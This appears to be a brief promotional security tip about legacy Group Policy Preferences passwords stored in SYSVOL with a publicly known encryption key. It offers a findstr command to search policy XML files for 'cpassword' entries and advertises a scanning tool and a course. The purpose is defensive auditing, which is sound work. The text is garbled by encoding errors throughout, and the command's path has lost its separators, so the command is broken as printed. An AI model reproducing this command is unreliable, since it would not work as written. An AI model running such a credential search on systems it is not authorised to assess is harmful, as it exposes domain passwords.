Ready to learn?

Passwords in Group Policy

๐Ÿ”’ Secure Bits ๐Ÿ’ก
๐—”๐—ฟ๐—ฒ ๐—ฝ๐—ฎ๐˜€๐˜€๐˜„๐—ผ๐—ฟ๐—ฑ๐˜€ ๐—ต๐—ถ๐—ฑ๐—ถ๐—ป๐—ด ๐—ถ๐—ป ๐˜†๐—ผ๐˜‚๐—ฟ ๐—š๐—ฟ๐—ผ๐˜‚๐—ฝ ๐—ฃ๐—ผ๐—น๐—ถ๐—ฐ๐—ถ๐—ฒ๐˜€?

๐—›๐—ผ๐˜„ ๐—ผ๐—น๐—ฑ is your Active Directory? Are you sure there’s no history of stored credentials?

๐Ÿšจ Before 2014, many admins used Group Policy Preferences (GPP) to ๐˜€๐—ฒ๐˜ ๐—ฝ๐—ฎ๐˜€๐˜€๐˜„๐—ผ๐—ฟ๐—ฑ๐˜€ for tasks, services, and other configurations. It was convenientโ€”but ๐—ฑ๐—ฎ๐—ป๐—ด๐—ฒ๐—ฟ๐—ผ๐˜‚๐˜€๐—น๐˜† ๐—ถ๐—ป๐˜€๐—ฒ๐—ฐ๐˜‚๐—ฟ๐—ฒ. Microsoft patched this in 2014, but old, vulnerable GPOs may still exist.

๐—ง๐—ต๐—ฒ ๐—ฝ๐—ฟ๐—ผ๐—ฏ๐—น๐—ฒ๐—บ?
โ–ช๏ธThese passwords were stored in SYSVOL, accessible to any authenticated user.
โ–ช๏ธBut they were encrypted, right?
โ–ช๏ธYes… but….the ๐—”๐—˜๐—ฆ ๐—ฒ๐—ป๐—ฐ๐—ฟ๐˜†๐—ฝ๐˜๐—ถ๐—ผ๐—ป ๐—ธ๐—ฒ๐˜† ๐˜„๐—ฎ๐˜€ ๐—ฝ๐˜‚๐—ฏ๐—น๐—ถ๐—ฐ๐—น๐˜† ๐—ธ๐—ป๐—ผ๐˜„๐—ปโ€”making decryption trivial.

๐Ÿ’ก ๐—›๐—ผ๐˜„ ๐˜๐—ผ ๐—ฐ๐—ต๐—ฒ๐—ฐ๐—ธ if your environment is still exposed:
Run this simple PowerShell command:

$domain = Get-ADDomain | select -ExpandProperty Forest
findstr /S /I cpassword \$domainSYSVOL$domainPolicies*.xml

โœ… ๐—ข๐—ฟ ๐˜‚๐˜€๐—ฒ ๐—บ๐˜† ๐—ณ๐—ฟ๐—ฒ๐—ฒ ๐˜๐—ผ๐—ผ๐—น, ADProbe, to scan your Active Directory:
https://academy.horizon-secured.com/p/adprobe

buy a course